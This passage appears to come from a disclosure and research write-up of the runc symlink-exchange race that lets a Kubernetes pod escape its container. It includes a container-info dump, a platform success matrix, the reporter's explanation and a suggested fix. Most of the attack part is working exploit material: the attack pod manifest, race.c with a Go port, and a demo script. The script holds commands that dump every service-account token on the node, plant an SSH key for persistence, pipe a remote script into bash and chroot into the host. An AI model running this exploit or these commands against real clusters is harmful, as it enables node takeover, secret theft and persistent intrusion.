"CONTAINER_RUNNING", "createdAt": "2021-05-21T00:52:20.4450061Z", "startedAt": "2021-05-21T00:52:20.6401701Z", "finishedAt": "1970-01-01T00:00:00Z", "exitCode": 0, "image": { "annotations": {}, "image": "docker.io/library/nginx:latest" }, "imageRef": "docker.io/library/nginx@sha256:df13abe416e37eb3db4722840dd479b00ba193ac6606e7902331dcea50f4f1f2", "reason": "", "message": "", "labels": { "io.kubernetes.container.name": "1-exploit", "io.kubernetes.pod.name": "exploit", "io.kubernetes.pod.namespace": "default", "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3" }, "annotations": { "io.kubernetes.container.hash": "7a407414", "io.kubernetes.container.restartCount": "0", "io.kubernetes.container.terminationMessagePath": "/dev/termination-log", "io.kubernetes.container.terminationMessagePolicy": "File", "io.kubernetes.pod.terminationGracePeriod": "30" }, "mounts": [ { "containerPath": "/rootfs", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false }, { "containerPath": "/rootfs/host", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false }, { "containerPath": "/var/run/secrets/kubernetes.io/serviceaccount", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj", "propagation": "PROPAGATION_PRIVATE", "readonly": true, "selinuxRelabel": false }, { "containerPath": "/etc/hosts", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false }, { "containerPath": "/dev/termination-log", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false } ], "logPath": "/var/log/pods/default_exploit_72c63ff5-05fd-465d-81c0-8bcfdd58edb3/1-exploit/0.log" }, "info": { "sandboxID": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8", "pid": 2893952, "removing": false, "snapshotKey": "addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060", "snapshotter": "overlayfs", "runtimeType": "io.containerd.runc.v2", "runtimeOptions": null, "config": { "metadata": { "name": "1-exploit" }, "image": { "image": "sha256:f0b8a9a541369db503ff3b9d4fa6de561b300f7363920c2bff4577c6c24c5cf6" }, "command": [ "sleep", "infinity" ], "envs": [ { "key": "KUBERNETES_PORT_443_TCP_ADDR", "value": "10.96.0.1" }, { "key": "KUBERNETES_SERVICE_HOST", "value": "10.96.0.1" }, { "key": "KUBERNETES_SERVICE_PORT", "value": "443" }, { "key": "KUBERNETES_SERVICE_PORT_HTTPS", "value": "443" }, { "key": "KUBERNETES_PORT", "value": "tcp://10.96.0.1:443" }, { "key": "KUBERNETES_PORT_443_TCP", "value": "tcp://10.96.0.1:443" }, { "key": "KUBERNETES_PORT_443_TCP_PROTO", "value": "tcp" }, { "key": "KUBERNETES_PORT_443_TCP_PORT", "value": "443" } ], "mounts": [ { "container_path": "/rootfs", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume" }, { "container_path": "/rootfs/host", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume" }, { "container_path": "/var/run/secrets/kubernetes.io/serviceaccount", "host_path": 
"/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj", "readonly": true }, { "container_path": "/etc/hosts", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts" }, { "container_path": "/dev/termination-log", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf" } ], "labels": { "io.kubernetes.container.name": "1-exploit", "io.kubernetes.pod.name": "exploit", "io.kubernetes.pod.namespace": "default", "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3" }, "annotations": { "io.kubernetes.container.hash": "7a407414", "io.kubernetes.container.restartCount": "0", "io.kubernetes.container.terminationMessagePath": "/dev/termination-log", "io.kubernetes.container.terminationMessagePolicy": "File", "io.kubernetes.pod.terminationGracePeriod": "30" }, "log_path": "1-exploit/0.log", "linux": { "resources": { "cpu_period": 100000, "cpu_shares": 2, "oom_score_adj": 1000, "hugepage_limits": [ { "page_size": "1GB" }, { "page_size": "2MB" } ] }, "security_context": { "namespace_options": { "pid": 1 }, "run_as_user": {}, "masked_paths": [ "/proc/acpi", "/proc/kcore", "/proc/keys", "/proc/latency_stats", "/proc/timer_list", "/proc/timer_stats", "/proc/sched_debug", "/proc/scsi", "/sys/firmware" ], "readonly_paths": [ "/proc/asound", "/proc/bus", "/proc/fs", "/proc/irq", "/proc/sys", "/proc/sysrq-trigger" ] } } }, "runtimeSpec": { "ociVersion": "1.0.2-dev", "process": { "user": { "uid": 0, "gid": 0 }, "args": [ "sleep", "infinity" ], "env": [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "HOSTNAME=exploit", "NGINX_VERSION=1.19.10", "NJS_VERSION=0.5.3", "PKG_RELEASE=1~buster", "KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1", "KUBERNETES_SERVICE_HOST=10.96.0.1", "KUBERNETES_SERVICE_PORT=443", "KUBERNETES_SERVICE_PORT_HTTPS=443", "KUBERNETES_PORT=tcp://10.96.0.1:443", "KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443", "KUBERNETES_PORT_443_TCP_PROTO=tcp", "KUBERNETES_PORT_443_TCP_PORT=443" ], "cwd": "/", "capabilities": { "bounding": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ], "effective": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ], "inheritable": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ], "permitted": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ] }, "oomScoreAdj": 1000 }, "root": { "path": "rootfs" }, "mounts": [ { "destination": "/proc", "type": "proc", "source": "proc", "options": [ "nosuid", "noexec", "nodev" ] }, { "destination": "/dev", "type": "tmpfs", "source": "tmpfs", "options": [ "nosuid", "strictatime", "mode=755", "size=65536k" ] }, { "destination": "/dev/pts", "type": "devpts", "source": "devpts", "options": [ "nosuid", "noexec", "newinstance", "ptmxmode=0666", "mode=0620", "gid=5" ] }, { "destination": "/dev/mqueue", "type": "mqueue", 
"source": "mqueue", "options": [ "nosuid", "noexec", "nodev" ] }, { "destination": "/sys", "type": "sysfs", "source": "sysfs", "options": [ "nosuid", "noexec", "nodev", "ro" ] }, { "destination": "/sys/fs/cgroup", "type": "cgroup", "source": "cgroup", "options": [ "nosuid", "noexec", "nodev", "relatime", "ro" ] }, { "destination": "/rootfs", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/rootfs/host", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/etc/hosts", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/dev/termination-log", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/etc/hostname", "type": "bind", "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/hostname", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/etc/resolv.conf", "type": "bind", "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/resolv.conf", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/dev/shm", "type": "bind", "source": "/run/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/shm", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/var/run/secrets/kubernetes.io/serviceaccount", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj", "options": [ "rbind", "rprivate", "ro" ] } ], "annotations": { "io.kubernetes.cri.container-name": "1-exploit", "io.kubernetes.cri.container-type": "container", "io.kubernetes.cri.sandbox-id": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8" }, "linux": { "resources": { "devices": [ { "allow": false, "access": "rwm" } ], "memory": {}, "cpu": { "shares": 2, "period": 100000 } }, "cgroupsPath": "/kubelet/kubepods/besteffort/pod72c63ff5-05fd-465d-81c0-8bcfdd58edb3/addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060", "namespaces": [ { "type": "pid" }, { "type": "ipc", "path": "/proc/2893298/ns/ipc" }, { "type": "uts", "path": "/proc/2893298/ns/uts" }, { "type": "mount" }, { "type": "network", "path": "/proc/2893298/ns/net" } ], "maskedPaths": [ "/proc/acpi", "/proc/kcore", "/proc/keys", "/proc/latency_stats", "/proc/timer_list", "/proc/timer_stats", "/proc/sched_debug", "/proc/scsi", "/sys/firmware" ], "readonlyPaths": [ "/proc/asound", "/proc/bus", "/proc/fs", "/proc/irq", "/proc/sys", "/proc/sysrq-trigger" ] } } } } ``` D: I've pushed an image with runc r95 baked in. You can use it like: This has k8s 1.20.7 containerd 1.5.2 and runc rc95. 
```
kind create cluster --image=mauilion/node:runc95
```
## Testing Matrix:

* Whatever makes sense for platform version
* containerd --version
* runc --version (rc94 and below is likely vulnerable)

| Platform | Version | K8s | Containerd | Runc | Success |
|---|---|---|---|---|---|
| Kind | 0.10.0 | 1.20.2 | 1.4.0 | 1.0.0-rc92 | Yes |
| Kind | 0.11.0 | 1.21.1 | 1.5.1 | 1.0.0-rc94 | Yes |
| Kind | 0.11.0 | 1.20.7 | 1.5.2 | 1.0.0-rc95 | No |
| Kind | 0.10.0 | 1.20.2 | 1.4.0 | 1.0.0-rc95+dev* | No |
| Kubeadm | 1.21.1 | 1.21.1 | 1.4.4 | 1.0.0-rc93 | Yes |
| GKE regular | 1.19.9-gke.1400 | 1.19.9 | 1.4.3 | 1.0.0-rc10 | Yes |
| GKE alpha | 1.20.6-gke.1000 | 1.20.6 | 1.4.3 | 1.0.0-rc92 | Yes |
| EKS | 1.19.8-eks-96780e | 1.19.8 | 1.4.1 | 1.0.0-rc92 | Yes** |
| AKS | regular | 1.19.9 | 1.4.4+azure | 1.0.0-rc92 | Yes |
| Civo | latest | v1.20.0-k3s1 | 1.4.3-k3s1 | 1.0.0-rc92 | Yes |
| RKE1 | 1.2.8 | 1.20.6 | 1.4.4 | 1.0.0-rc93 | Yes |

\* Compiled runc by hand from HEAD on 5/23

\** Custom AMI: ami-01ac4896bf23dcbf7 us-east-2 (amazon-eks-node-1.19-v20210512) and earlier

---

Etienne's original report

Hello runc maintainers,

When mounting a volume, runc trusts the source and will follow symlinks, but it doesn't trust the target argument and will use the 'filepath-securejoin' library to resolve any symlinks and ensure the resolved target stays inside the container root. As explained in the SecureJoinVFS documentation (https://github.com/cyphar/filepath-securejoin/blob/40f9fc27fba074f2e2eebb3f74456b4c4939f4da/join.go#L57), using this function is only safe if you know that the checked file is not going to be replaced by a symlink; the problem is that we can replace it with a symlink.

In K8S there is a trivial way to control the target: create a pod with multiple containers sharing some volumes, one with a correct image, and the other ones with non-existent images so they don't start right away.
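The bug being raced is the classic gap between the SecureJoin check and the mount(2) call. A minimal Go sketch of that vulnerable pattern, assuming a made-up helper `mountVolume` (this is the shape of the logic, not runc's actual code; the two library calls are the real ones):

``` go
// Sketch of the vulnerable check-then-mount pattern described above.
package main

import (
	"fmt"

	securejoin "github.com/cyphar/filepath-securejoin"
	"golang.org/x/sys/unix"
)

func mountVolume(rootfs, source, dest string) error {
	// Resolve dest relative to rootfs, chasing symlinks so the result stays
	// inside the container root... at the moment of the check.
	target, err := securejoin.SecureJoin(rootfs, dest)
	if err != nil {
		return err
	}
	// <-- TOCTOU window: anyone sharing this volume can now swap the checked
	// directory for a symlink (renameat2 RENAME_EXCHANGE in the POC below).
	// mount(2) resolves the target path again and follows that symlink.
	return unix.Mount(source, target, "", unix.MS_BIND, "")
}

func main() {
	// Illustrative paths only; actually mounting needs root.
	if err := mountVolume("/path/to/rootfs", "/path/to/volume", "/test1/mnt1"); err != nil {
		fmt.Println(err)
	}
}
```

Everything between the SecureJoin call and the Mount call is the window the POC below races.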
Let's start with the POC first and the explanations after # Create our attack POD > > kubectl create -f - <<EOF > apiVersion: v1 > kind: Pod > metadata: > name: attack > spec: > terminationGracePeriodSeconds: 1 > containers: > - name: c1 > image: ubuntu:latest > command: [ "/bin/sleep", "inf" ] > env: > - name: MY_POD_UID > valueFrom: > fieldRef: > fieldPath: metadata.uid > volumeMounts: > - name: test1 > mountPath: /test1 > - name: test2 > mountPath: /test2 > $(for c in {2..20}; do > cat <<EOC > - name: c$c > image: donotexists.com/do/not:exist > command: [ "/bin/sleep", "inf" ] > volumeMounts: > - name: test1 > mountPath: /test1 > $(for m in {1..4}; do > cat <<EOM > - name: test2 > mountPath: /test1/mnt$m > EOM > done > ) > - name: test2 > mountPath: /test1/zzz > EOC > done > ) > volumes: > - name: test1 > emptyDir: > medium: "Memory" > - name: test2 > emptyDir: > medium: "Memory" > EOF # Compile race.c (see attachment, simple binary running renameat2(dir,symlink,RENAME_EXCHANGE)) > > gcc race.c -O3 -o race # Wait for the container c1 to start, upload the 'race' binary to it, and exec bash > > sleep 30 # wait for the first container to start > kubectl cp race -c c1 attack:/test1/ > kubectl exec -ti pod/attack -c c1 -- bash # you now have a shell in container c1 # Create the following symlink (explanations later) > > ln -s / /test2/test2 # Launch 'race' multiple times to try to exploit this TOCTOU > > cd test1 > seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/ # Now that everything is ready, in a second shell, update the images so that the other containers can start > > for c in {2..20}; do > kubectl set image pod attack c$c=ubuntu:latest > done # Wait a bit and look at the results > > for c in {2..20}; do > echo ~~ Container c$c ~~ > kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz > done > > ~~ Container c2 ~~ > test2 > ~~ Container c3 ~~ > test2 > ~~ Container c4 ~~ > test2 > ~~ Container c5 ~~ > bin dev home lib64 mnt postinst root sbin tmp var > boot etc lib lost+found opt proc run sys usr > ~~ Container c6 ~~ > bin dev home lib64 mnt postinst root sbin tmp var > boot etc lib lost+found opt proc run sys usr > ~~ Container c7 ~~ > error: unable to upgrade connection: container not found ("c7") > ~~ Container c8 ~~ > test2 > ~~ Container c9 ~~ > bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var > ~~ Container c10 ~~ > test2 > ~~ Container c11 ~~ > bin dev home lib64 mnt postinst root sbin tmp var > boot etc lib lost+found opt proc run sys usr > ~~ Container c12 ~~ > test2 > ~~ Container c13 ~~ > test2 > ~~ Container c14 ~~ > test2 > ~~ Container c15 ~~ > bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var > ~~ Container c16 ~~ > error: unable to upgrade connection: container not found ("c16") > ~~ Container c17 ~~ > error: unable to upgrade connection: container not found ("c17") > ~~ Container c18 ~~ > bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var > ~~ Container c19 ~~ > error: unable to upgrade connection: container not found ("c19") > ~~ Container c20 ~~ > test2 On my first try I had 6 containers where /test1/zzz was / on the node, some failed to start, and the remaining were not affected. Even without the ability to update images, we could use a fast registry for c1 and a slow registry or big container for c2+, we just need c1 to start 1sec before the others. 
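race.c (attached further down in this writeup) is just a tight renameat2(RENAME_EXCHANGE) loop that atomically swaps a directory with a symlink. For readers who prefer Go, here is a rough, untested equivalent using golang.org/x/sys/unix with the same three arguments as the C version:

``` go
// Rough Go equivalent of race.c: endlessly exchange name1 (a directory) with
// name2 (a symlink to linkdest) in the current working directory.
package main

import (
	"log"
	"os"

	"golang.org/x/sys/unix"
)

func main() {
	if len(os.Args) != 4 {
		log.Fatalf("usage: %s name1 name2 linkdest", os.Args[0])
	}
	name1, name2, linkdest := os.Args[1], os.Args[2], os.Args[3]

	// Best effort setup: a real directory and a symlink pointing at linkdest.
	_ = os.Mkdir(name1, 0o755)
	_ = os.Symlink(linkdest, name2)

	// Swap them forever. At any instant name1 is either a directory (so
	// SecureJoin is happy) or a symlink (so mount(2) follows it).
	for {
		// Errors are ignored, matching race.c's behaviour.
		_ = unix.Renameat2(unix.AT_FDCWD, name1, unix.AT_FDCWD, name2, unix.RENAME_EXCHANGE)
	}
}
```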
Tests were done on the following GKE cluster:
>
> gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes

K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs

I haven't dug too deep in the code and relied on strace to understand what was happening, and I did the investigation maybe a month ago so details are fuzzy, but here is my understanding:

1) K8S prepares all the volumes for the pod in /var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME (the fact that the paths are known definitely helps this attack)
2) containerd prepares the rootfs at /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs
3) runc calls unshare(CLONE_NEWNS), thus preventing the following mount operations from affecting other containers or the node directly
4) runc bind mounts the K8S volumes
4.1) runc calls securejoin.SecureJoin to resolve the destination/target
4.2) runc calls mount()

K8S doesn't give us control over the mount source, but we have full control over the target of the mounts, so the trick is to mount a directory containing a symlink over the K8S volumes path so that the next mount uses this new source and gives us access to the node root filesystem.

From the node the filesystem looks like this
>
> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1
> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2
> ...
> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /

Our 'race' binary is constantly swapping mntX and mnt-tmpX. When c2+ start, they do the following mounts

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)

If we are lucky, when we call SecureJoin mntX is a directory, and when we call mount mntX is a symlink, and as mount follows symlinks, this gives us

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)

The filesystem now looks like
>
> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1/
> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2/
> ...
> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /

When we do the final mount

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/zzz)

becomes

mount(/, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)

And we now have full access to the whole node root, including /dev, /proc, all the tmpfs and overlay of other containers, everything :)

A possible fix is to replace secureJoin with the same approach as used to fix the K8S subpath vulnerability: https://kubernetes.io/blog/2018/04/04/fixing-subpath-volume-vulnerability/#the-solution
openat() files one by one disabling symlinks, manually follow symlinks, check if we are still in the container root at the end, and then bind mount /proc/<runc pid>/fd/<final fd>

If I understand correctly, crun either uses openat2() or some manual resolution (such as secureJoin) followed by a check of openat(/proc/self/fd/...) so I think they are safe. Haven't checked any other runtime.

#### race.c
```
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(int argc, char *argv[])
{
    if (argc != 4) {
        fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    char *name1 = argv[1];
    char *name2 = argv[2];
    char *linkdest = argv[3];

    int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
    if (dirfd < 0) {
        perror("Error open CWD");
        exit(EXIT_FAILURE);
    }

    if (mkdir(name1, 0755) < 0) {
        perror("mkdir failed");
        //do not exit
    }
    if (symlink(linkdest, name2) < 0) {
        perror("symlink failed");
        //do not exit
    }

    while (1) {
        renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
    }
}
```
# DEMO SCRIPT ```bash #!/usr/bin/env bash # honk.sh # 0. Set up a minikube with runC less than rc94 # 1. Run the real thing and get it to "win" # 2. Modify BASEHASH, WINHASH, and WINHONK accordingly # 3. Run ./honk.sh BASEHASH="honk-68b95d5858" # The pod that won WINHASH="$BASEHASH-8k6tr" # The number of the n-honk container that won WINHONK="5" # "n" corresponds to "n-honk" TRYSLEEP="1.6" ######################## # include the magic ######################## .
lib/demo-magic.sh TYPE_SPEED=23 clear echo "" p "# We have RBAC access to create daemonsets, deployments, and\n pods in the default namespace of a 1.20.2 cluster:" kubectx minikube 2> /dev/null 1> /dev/null pe "kubectl version --short=true | grep Server" pe "kubectl get nodes" p "kubectl get pods --all-namespaces" kubectl get pods --all-namespaces | grep -v " honk-" p "# The worker nodes are running a vulnerable version of runC" p "runc --version" docker exec -it minikube runc --version clear p "# Unleash the honks 🦢🦢🦢🦢!!!!" p "curl -L http://git.io/honk-symlink.sh | REPLICAS=10 bash" echo "staging the nginx:stable image with a daemonset" sleep 1.4 echo "daemonset.apps/honk-stage created" sleep 0.7 echo "waiting for the image staging" sleep 1.5 echo "Succeeded" sleep 0.3 echo "Deploying the honk deployment." sleep 0.5 echo "deployment.apps/honk created" sleep 0.2 echo "Waiting for things to deploy for 5 seconds before starting" sleep 5.2 ATTEMPTS=1 while [ $ATTEMPTS -le 10 ]; do for POD in 592sn 5cbj5 8l8z6 98h9c 9hlgw jjmqb ngslb nmqqg pbf2t a1312; do echo "attempt $ATTEMPTS" COUNTER=1 while [ $COUNTER -le 5 ]; do sleep 0.2 echo -n "Checking pod/$BASEHASH-$POD $COUNTER-honk for the host mount..." sleep $TRYSLEEP echo "nope." let COUNTER=$COUNTER+1 sleep 0.1 done echo "pod/$BASEHASH-$POD force deleted" let ATTEMPTS=$ATTEMPTS+1 done done echo "attempt 11" COUNTER=1 while [ $COUNTER -le 5 ]; do sleep 0.3 echo -n "Checking pod/$WINHASH $COUNTER-honk for the host mount..." sleep $TRYSLEEP if [ $COUNTER -eq $WINHONK ]; then echo "SUCCESS after 11 attempts! Run:" echo "kubectl exec -it $WINHASH -c $WINHONK-honk -- bash" exit 0 else echo "nope." fi let COUNTER=$COUNTER+1 done exit ###### ## Demo commands hostname # container's ip a # container's ps -ef # host's kill # but can't kill # Steal all mounted secrets in pods running on this node find /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token -print -exec cat {} \; # Modify/add static pod manifest to get kubelet to run anything you want ls /etc/kubernetes/manifests/ # Add an SSH key for persistence mkdir -p /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOfpWd+R+XDteC89yiFPxf7h7p/d/v+RT5CFK1pMJ9sTE//eQqTVIiHXBNDTyTfXP7dK/VUs5wBbenDtZNKCKrHNlVjKWAIkUvVfxCP3tocubq+ydGmOwrR9FDKk1Otd525FXI3Nip66DlvAGydUD5VgIhsLvi+qNV/Wh7hFhTMnBDvGhl7MsXfM+tNlF6X+EPz3sJ42z4M9nn42NAjYTQTl4jnDhhmgBBE0q+VXKPIOPd2hXXFy2w9/YJrmuFdSpRTaEgIsG17XcTY852UULzeKaVSBFBtZvlxrag4u/yF1dJPPg5EcxA7UjbzSVPAht1BwHULPbRyDr1ttutiBOZ" >> /root/.ssh/authorized_keys # Interact with docker docker ps # Run am I contained and notice some limitations curl -fsSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.9/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" && chmod a+x "/usr/local/bin/amicontained" amicontained # Leverage docker to run a fully privileged container and exec into it docker run --privileged --net=host --pid=host --volume /:/host -it nginx:stable chroot /host /bin/bash # Rerun hostname # host's ip a # host's ps -ef # host's kill # Now we can kill processes # Run am I contained and notice we aren't limited anymore curl -fsSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.9/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" && chmod a+x "/usr/local/bin/amicontained" amicontained exit ########### # Cleanup # ########### # kubectl delete ds --all # kubectl delete deploy --all # kubectl delete po --all --grace-period=0 --force ```
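Finally, Etienne's note above ("If you can forbid mount into mounts you prevent this attack") can be turned into a simple policy check on pod specs. A minimal Go sketch of that idea; `volumeMount` here is a stand-in for the real k8s.io/api/core/v1 types, and a real admission webhook would need more care than a prefix test:

``` go
// Sketch: flag "mount into mounts" in a container's volumeMounts list.
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

type volumeMount struct {
	Name      string
	MountPath string
}

// nestedMounts reports every volumeMount whose mountPath lives underneath
// another volumeMount's mountPath in the same container.
func nestedMounts(mounts []volumeMount) [][2]volumeMount {
	var nested [][2]volumeMount
	for _, outer := range mounts {
		for _, inner := range mounts {
			op := filepath.Clean(outer.MountPath)
			ip := filepath.Clean(inner.MountPath)
			if ip != op && strings.HasPrefix(ip, op+string(filepath.Separator)) {
				nested = append(nested, [2]volumeMount{outer, inner})
			}
		}
	}
	return nested
}

func main() {
	// The volumeMounts from Etienne's example pod.
	mounts := []volumeMount{
		{Name: "test1", MountPath: "/test1"},
		{Name: "test2", MountPath: "/test1/mnt2"},
	}
	for _, pair := range nestedMounts(mounts) {
		fmt.Printf("deny: %q (%s) is mounted inside %q (%s)\n",
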